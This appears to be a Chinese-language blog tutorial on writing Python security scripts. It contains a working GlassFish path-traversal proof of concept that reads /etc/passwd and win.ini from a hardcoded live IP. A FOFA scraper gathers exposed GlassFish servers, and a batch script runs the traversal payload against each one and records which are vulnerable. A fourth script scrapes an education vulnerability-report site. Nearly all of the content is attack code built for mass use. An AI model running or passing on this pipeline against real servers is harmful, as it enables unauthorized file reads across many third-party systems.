77:Python開發-批量Fofa&POC驗證&SRC提取
阿新 • • 發佈:2021-08-19
本課知識點:
- Request爬蟲技術,lxml資料提取,異常處理,fofa等使用說明
- 掌握利用公開或0day漏洞進行批量化的收集及驗證指令碼開發
案例1:某漏洞POC驗證指令碼
漏洞學習:- 應用伺服器glassfish任意檔案讀取漏洞(https://www.secpulse.com/archives/42277.html)
# Author:Zhengna import requests def glassfish_vcheck(url): payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwdglassfish任意檔案讀取漏洞POC" payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini" data_linux = requests.get(url+payload_linux) #獲取請求後的返回原始碼 data_windows = requests.get(url+payload_windows) #獲取請求後的返回原始碼 statuscode_linux= data_linux.status_code #獲取請求後的返回狀態碼 statuscode_windows = data_windows .status_code #獲取請求後的返回狀態碼 if statuscode_linux == 200: print("glassfish任意檔案讀取漏洞存在") print(data_linux.text) elif statuscode_windows == 200: print("glassfish任意檔案讀取漏洞存在") print(data_windows.text)else: print("glassfish任意檔案讀取漏洞不存在") if __name__ == '__main__': #可以進入fofa網址,搜尋app="glassfish" && port="4848",找到可能存在漏洞的網站。 url = "http://3.0.49.154:4848" glassfish_vcheck(url) #連線異常可參考解決方法:https://blog.csdn.net/a1007720052/article/details/83383220
案例2:Fofa搜尋結果批量採集指令碼
1.手動採集- 進入fofa網址(https://fofa.so/),搜尋"glassfish" && port="4848",找到可能存在漏洞的網站。
# Author:Serena import requests,base64,time from lxml import etree #提前安裝 lxml模組:python3 -m pip install lxml ''' 如何實現這個漏洞批量化: 1.獲取到可能存在漏洞的地址資訊-藉助Fofa進行獲取目標 1.1將請求的資料進行篩選 2.批量請求地址資訊進行判斷是否存在-單執行緒和多執行緒 ''' #非會員,只能收集10條 def ip_collect(): url = "https://fofa.so/result?qbase64=" search_data = '"glassfish" && port="4848" && country="CN" ' # search_data = '"glassfish" && port="4848" ' search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8") urls = url+search_data_b64 result = requests.get(urls).content soup = etree.HTML(result) ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href') ip_data=set(ip_data) #去除重複的IP # print(ip_data) ipdata = '\n'.join(ip_data) with open(r'ip-10.txt','a+') as f: f.write(ipdata+'\n') #會員,可收集很多條 def ip_collect_vip(): search_data = '"glassfish" && port="4848"' search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8") headers = { 'cookie':'_fofapro_ars_session=aaaaaaaaaaaaaaaaaaaaaaaaa' } for pageNumber in range(1,11): urls = "https://fofa.so/result?page="+str(pageNumber)+"&qbase64="+search_data_b64 print('正在提取第'+str(pageNumber)+'頁') try: result = requests.get(urls,headers=headers,timeout=0.5).content soup = etree.HTML(result) ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href') ip_data = set(ip_data) # 去除重複的IP print(ip_data) ipdata = '\n'.join(ip_data) with open(r'ip-200.txt','a+') as f: f.write(ipdata+'\n') except Exception as e: pass if __name__ == '__main__': ip_collect() # ip_collect_vip()Fofa批量提取
案例3:某漏洞POC批量驗證指令碼
# Author:Zhengna import time import requests def glassfish_vcheck(): payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini" for url in open('ip-10.txt'): url = url.replace('\n', '') data_linux = requests.get(url + payload_linux) # 獲取請求後的返回原始碼 data_windows = requests.get(url + payload_windows) # 獲取請求後的返回原始碼 statuscode_linux = data_linux.status_code # 獲取請求後的返回狀態碼 statuscode_windows = data_windows.status_code # 獲取請求後的返回狀態碼 print("check->" + url) try: with open(r'vuln.txt', 'a+',encoding='utf8') as f: if statuscode_linux == 200: f.write("-----------------------------------------------\n") f.write(url + "存在glassfish任意檔案讀取漏洞\n") f.write(url + "是linux系統\n") # f.write(data_linux.text) elif statuscode_windows == 200: f.write("-----------------------------------------------\n") f.write(url + "存在glassfish任意檔案讀取漏洞\n") f.write(url + "是windows系統\n") # f.write(data_windows.text) else: f.write("-----------------------------------------------\n") f.write(url + "不存在glassfish任意檔案讀取漏洞\n") time.sleep(0.5) except Exception as e: pass if __name__ == '__main__': glassfish_vcheck()glassfish任意檔案讀取漏洞POC批量驗證
案例4:教育SRC報告平臺資訊批量提取指令碼
教育行業漏洞報告平臺(Beta):https://src.sjtu.edu.cn/# Author:zhengna import requests,time from lxml import etree def src_collect(page): try: for i in range(1,int(page)+1): url = "https://src.sjtu.edu.cn/list/?page="+str(i) print("正在提取第"+str(i)+"頁") r = requests.get(url).content soup = etree.HTML(r) result = soup.xpath('//td[@class=""]/a/text()') results = '\n'.join(result) resultss = results.split() for edu in resultss: with open(r'src-edu.txt','a+',encoding='utf-8') as f: f.write(edu + '\n') except Exception as e: time.sleep(0.5) pass if __name__ == '__main__': page = input("你需要提取幾頁?-->") src_collect(page)src_collect